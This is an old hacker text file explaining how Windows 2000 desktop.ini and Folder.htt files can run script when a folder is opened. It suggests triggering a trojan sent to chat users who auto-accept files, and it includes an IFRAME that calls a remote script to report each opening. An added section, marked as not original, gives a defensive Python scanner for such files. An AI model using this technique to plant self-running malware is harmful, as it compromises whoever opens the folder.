Crim3 is no longer a member of Hack3z since he found out
that the founder of this group used defacings of websites to
promote the clan. This kind of activity bothers me at great
length and I will no longer support any hacking crew. At a
certain age you discover that you can only trust yourself.

What is in this text:
---------------------
This text will explain an exploit that shows the threat of
a single folder on your computer with write access for everyone
(like the home directory of your free FTP server) or of
auto-accepting files with your chat client.
The exploit has only been tested on W2K machines and it
involves triggering a sent virus without the need to click
on it.
The way this is done is by exploiting the HTML-based
folders in Windows.
The problem is exactly the same as the execution of viruses
in Outlook-based emails.

HTML-based folders under Windows:
---------------------------------
Windows constructs its Explorer screens using HTML code.
This code is stored in the *.htt files. The global (default)
file used is desktop.htt, located (for W2K) in "c:\documents
and settings\USERNAME\Application Data\Microsoft\Internet
Explorer", which is usually protected. However, you can create
a different *.htt layout file for each folder. You can do
this quickly through the menu. All that the wizard does
is create a new file called folder.htt and one called
desktop.ini. Other additional files are also created
depending on the type of layout you have chosen. The
desktop.ini file is placed directly within the folder itself
and the folder.htt file is placed within a subdirectory
called 'Folder Settings'. All files are hidden, so make sure
you have the "show hidden files" option switched
on. Now that we have our custom folder, we are going to take
a look at both the folder.htt file and the desktop.ini file.

Desktop.ini:
------------
When opening the file it will look a lot like this:
[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder Settings\Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp
[ExtShellFolderViews]
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
[.ShellClassInfo]
ConfirmFileOp=0
We are not going to bother with the CLSIDs because they
have no value for the article (although looking up the CLSID
of a bat file in the registry and switching the command for
EDIT with that of RUN has some uses too *grin*). The only
thing of importance here is the PersistMoniker entry.
PersistMoniker= names the file containing the layout,
and here it states the Folder.htt in the Folder Settings
directory.
If you did check out the CLSID in the registry you would
have found the default path for the PersistMoniker
(folder.htt) as it is stated above.

The HTML Layout: Folder.htt
---------------------------
Open the file with your favorite HTML editor (preferably a
plain text editor). Here you have the code that builds your
folder layout (written in the bombastic and overkill way as
only Microsoft can).
The page starts by defining a load of variables that have
pretty well chosen names, so you can start changing things
to your liking a bit here.
The first large chunk of code is all dedicated to the
layout and is all JavaScript. I wouldn't tamper with the
code unless you really, REALLY know what you are doing.
Most of this code is irrelevant (I said MOST; the onclick
and keypress events are handled in here) and describes how
the window should handle text sizes and positioning on
events like a resizing of the screen.
The fun starts with the function "function Load()", which
is, as you may have guessed, the function that is triggered
when the folder is opened (look for it using F3 or CTRL-F).
Whatever code you want added to the page, add it here.
Then the actual HTML code starts.

Now that we have everything, what can we do with it?:
-----------------------------------------------------
The uses are as limited as VBScript, JavaScript, Perl, ASP, ...
So there are a lot of things that you can use this for. I
use it for securing personal folders by either deleting the
entire contents of the folder.htt file (returning an empty
page when the folder is opened with Explorer) or embedding a
script that triggers a virus or sends me an email notifying
that someone has opened the folder. The uses can be used for
good or for bad. Take for instance all those guys that
have auto accept enabled on their chat clients; try sending
a trojan with the desktop.ini and an altered htt file that
triggers the virus when the folder is opened? Or add a frame
with links to standard forms used in your company. One of
the most powerful options is embedding another file
located on the net, enabling you to use an ASP or Perl
script in the folder. For instance:
<IFRAME
src="http://intraserver/scripts/ASP/sendmail.asp?sender=?Foldername@remotehost"></IFRAME>
that's it
Best regards
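
Added example, not part of the original text: a defender's audit of the two files described above. It walks a directory tree (for instance an FTP upload area), reports every desktop.ini that sets PersistMoniker, and flags layouts that are loaded from, or that reference, a remote location. The function names and the "upload" sample folder are assumptions made for this example; the sample content is constructed from the desktop.ini lines and the IFRAME quoted in the text.

```python
import re
from pathlib import Path

# PersistMoniker line of a desktop.ini (PersistMonikerPreview does not match).
MONIKER = re.compile(r"^[ \t]*PersistMoniker[ \t]*=[ \t]*(.+?)[ \t\r]*$", re.I | re.M)
# src/href attributes in the layout file that point at http, https, ftp or a UNC path.
REMOTE_REF = re.compile(r"""(?:src|href)\s*=\s*["']?((?:https?://|ftp://|\\\\)[^"'\s>]+)""", re.I)

def read_text(path):
    """Decode a file: UTF-16 if it carries a BOM, otherwise byte-for-byte."""
    raw = path.read_bytes()
    bom = raw[:2] in (b"\xff\xfe", b"\xfe\xff")
    return raw.decode("utf-16" if bom else "latin-1", errors="replace")

def audit_tree(root):
    """Return (kind, desktop.ini path, detail) for every custom folder view under root."""
    findings = []
    for ini in sorted(p for p in Path(root).rglob("*") if p.name.lower() == "desktop.ini"):
        for moniker in MONIKER.findall(read_text(ini)):
            findings.append(("custom-view", str(ini), moniker))
            target = re.sub(r"^file://", "", moniker, flags=re.I)
            if re.match(r"(?:https?:|ftp:|[/\\]{2})", target, re.I):
                findings.append(("remote-layout", str(ini), moniker))
                continue
            htt = ini.parent / target.replace("\\", "/")  # case-sensitive off Windows
            if htt.is_file():
                for url in REMOTE_REF.findall(read_text(htt)):
                    findings.append(("remote-reference", str(ini), url))
    return findings

def build_sample(root):
    """Constructed sample: the desktop.ini lines and IFRAME quoted in the text."""
    folder = Path(root) / "upload"
    (folder / "Folder Settings").mkdir(parents=True)
    (folder / "desktop.ini").write_text(
        "[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]\n"
        "PersistMoniker=file://Folder Settings\\Folder.htt\n"
        "PersistMonikerPreview=%WebDir%\\folder.bmp\n")
    (folder / "Folder Settings" / "Folder.htt").write_text(
        '<html><body><IFRAME src="http://intraserver/scripts/ASP/sendmail.asp'
        '?sender=?Foldername@remotehost"></IFRAME></body></html>')
    return folder

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for kind, ini, detail in audit_tree(tmp):
            print(kind, ini, detail)
```

In a folder that outsiders can write to, any "custom-view" finding deserves a look, since the folder's owner did not create that desktop.ini.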
Credits
Crim3 (there's nothing wrong with not knowing, not learning
bothers me)
For more info: Criminal_insect at hotmail dot com